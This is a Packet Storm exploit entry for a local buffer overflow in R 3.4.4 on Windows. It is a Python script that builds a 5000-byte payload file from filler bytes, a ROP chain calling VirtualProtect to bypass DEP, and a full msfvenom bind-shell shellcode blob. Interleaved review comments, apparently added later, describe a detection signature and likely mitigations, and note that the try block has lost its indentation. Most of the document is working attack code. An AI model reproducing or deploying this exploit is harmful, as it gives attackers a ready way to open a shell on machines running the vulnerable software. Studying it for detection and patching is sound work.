R 3.4.4 Local Buffer Overflow

2018-05-22T00:00:00
ID PACKETSTORM:147807
Type packetstorm
Reporter Hashim Jawad
Modified 2018-05-22T00:00:00

Description

                                            `#!/usr/bin/python  
#################################################################################################################  
# Exploit Title : R v3.4.4 - Local Buffer Overflow (DEP Bypass) #  
# Exploit Author : Hashim Jawad #  
# Twitter : @ihack4falafel #   
# Author Website : ihack4falafel[.]com #  
# Vendor Homepage : https://www.r-project.org/ #  
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe #  
# Tested on OS : Microsoft Windows 7 Enterprise - SP1 (x86) #  
# Steps to reproduce : under GUI preferences, paste payload.txt contents into 'Language for menus and messages' #  
#################################################################################################################  
  
# Credit to bzyo for finding the bug (44516)  
  
import struct  
  
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode  
#Payload size: 718 bytes  
# Second-stage payload: the raw output of the msfvenom command recorded
# above (a bind-shell payload passed through the x86/alpha_mixed encoder,
# with \x00 \x0a \x0d \x0e excluded), assembled by string concatenation.
# NOTE(review): apart from a short non-alphanumeric prefix at the start of
# the first line, every byte appears to fall in the printable ASCII range,
# which is what the alpha_mixed encoder emits. For detection, a preference
# value or payload.txt made of a long run of 'A's followed by a mostly
# alphanumeric blob of roughly this size is a usable signature for this PoC.
shellcode = ""  
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"  
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"  
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"  
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"  
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"  
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"  
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"  
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"  
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"  
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"  
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"  
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"  
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"  
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"  
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"  
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"  
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"  
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"  
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"  
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"  
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"  
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"  
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"  
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"  
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"  
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"  
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"  
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"  
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"  
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"  
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"  
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"  
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"  
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"  
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"  
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"  
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"  
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"  
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"  
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"  
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"  
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"  
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"  
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"  
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"  
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"  
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"  
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"  
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"  
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"  
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"  
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"  
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"  
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"  
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"  
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"  
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"  
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"  
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"  
  
'''  
Output generated by mona.py v2.0, rev 582 - Immunity Debugger  
--------------------------------------------  
Register setup for VirtualProtect() :  
--------------------------------------------  
EAX = NOP (0x90909090)  
ECX = lpOldProtect (ptr to W address)  
EDX = NewProtect (0x40)  
EBX = dwSize  
ESP = lPAddress (automatic)  
EBP = ReturnTo (ptr to jmp esp)  
ESI = ptr to VirtualProtect()  
EDI = ROP NOP (RETN)  
--------------------------------------------  
'''  
  
# The triple-quoted literal above is an unassigned expression statement, so
# it is documentation only: it records the register layout the gadget chain
# below is arranged to produce before the closing PUSHAD.
# Every address in the chain is a fixed location inside the R 3.4.4 Windows
# build named in the header (R.dll, utils.dll, Riconv.dll, methods.dll,
# grDevices.dll, Rgraphapp.dll), so the chain is tied to that exact binary
# set. NOTE(review): this is a DEP-only bypass; it presumes those modules
# load at the same address on every run. Building R's DLLs with ASLR
# support (/DYNAMICBASE) would invalidate every address here — confirm
# against the PE headers of the affected build.
rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]   
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]  
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]   
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]   
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]   
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]  
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]   
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501  
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]   
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]   
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]   
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040  
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]   
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]   
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]   
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]  
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]   
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]  
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]   
rop += struct.pack('<L', 0x90909090) # nop  
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]   
  
# Final overflow buffer, padded so the whole thing is exactly 5000 bytes:
# 292 filler bytes up to the saved return address, one gadget address, the
# 4 bytes that gadget's POP ESI consumes, the chain, a 50-byte 0x90 sled,
# the shellcode, then 0x90 padding for whatever remains of the 5000.
# NOTE(review): the 292-byte offset and the 5000-byte total are what
# characterise the overflow; presumably the vendor-side fix is a length
# check on the "Language for menus and messages" preference value —
# confirm against the upstream patch.
buffer = '\x41' * 292 # filler to EIP  
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]  
buffer += '\x41' * 4 # compensate for pop esi  
buffer += rop  
buffer += '\x90' * 50  
buffer += shellcode  
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))  
  
# Write the assembled buffer to payload.txt in the current working
# directory (Python 2 syntax: `print` statement, no `with`). The header's
# reproduction step is to paste that file's contents into the GUI field.
# NOTE(review): the body lines under try:/except: have lost their
# indentation in this rendering and are shown as-is. The broad
# `except Exception` prints the error and swallows it, so a failure such as
# an unwritable directory would leave no payload without a non-zero exit.
try:  
f=open('payload.txt','w')  
print '[+] Creating %s bytes evil payload..' %len(buffer)  
f.write(buffer)  
f.close()  
print '[+] File created!'  
except Exception as e:  
print e  